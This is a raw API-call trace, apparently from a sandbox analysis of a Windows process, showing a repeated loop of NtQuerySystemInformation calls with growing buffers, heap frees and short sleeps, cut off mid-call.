[0233.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.533] Sleep (dwMilliseconds=0x110) [0233.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.544] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.552] Sleep (dwMilliseconds=0x110) [0233.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.621] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.627] Sleep (dwMilliseconds=0x110) [0233.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.640] Sleep (dwMilliseconds=0x110) [0233.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.659] Sleep (dwMilliseconds=0x110) [0233.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.673] Sleep (dwMilliseconds=0x110) [0233.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.693] Sleep (dwMilliseconds=0x110) [0233.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.706] Sleep (dwMilliseconds=0x110) [0233.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.719] Sleep (dwMilliseconds=0x110) [0233.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.738] Sleep (dwMilliseconds=0x110) [0233.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.751] Sleep (dwMilliseconds=0x110) [0233.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.769] Sleep (dwMilliseconds=0x110) [0233.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.785] Sleep (dwMilliseconds=0x110) [0233.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.800] Sleep (dwMilliseconds=0x110) [0233.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 